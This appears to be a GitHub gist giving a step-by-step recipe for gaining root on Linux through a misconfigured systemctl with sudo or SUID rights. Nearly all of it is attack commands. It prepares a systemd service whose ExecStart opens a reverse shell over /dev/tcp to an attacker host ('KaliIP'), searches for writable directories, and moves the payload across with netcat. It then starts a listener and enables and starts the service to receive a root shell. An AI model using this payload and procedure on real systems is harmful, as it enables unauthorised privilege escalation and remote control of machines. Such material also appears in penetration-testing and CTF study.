Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
Privilege Escalation: Systemctl (Misconfigured Permissions — sudo/SUID)

For better reading experience

0. Prepare your payload root.service


ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/KaliIP/9999 0>&1'


1. Find a files/directories that writable

find / -type f -maxdepth 2 -writable


find / -type d -maxdepth 2 -writable

2. Transfter the payload(Or just write file there using vi)

Init the target listening the port
nc -vl 44444 > root.service
Send file to traget
nc -n TargetIP 44444 < root.service

3. Start listening on the 9999

nc -lvnp 9999

4. Execute the payload(assume the file is under /dev/shm)

/bin/systemctl enable /dev/shm/root.service
Created symlink from /etc/systemd/system/ to /dev/shm/root.service
Created symlink from /etc/systemd/system/root.service -> /dev/shm/root.service
/bin/systemctl start root

5. The nc listening on 9999 would give you the root

Expand Knowlege

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment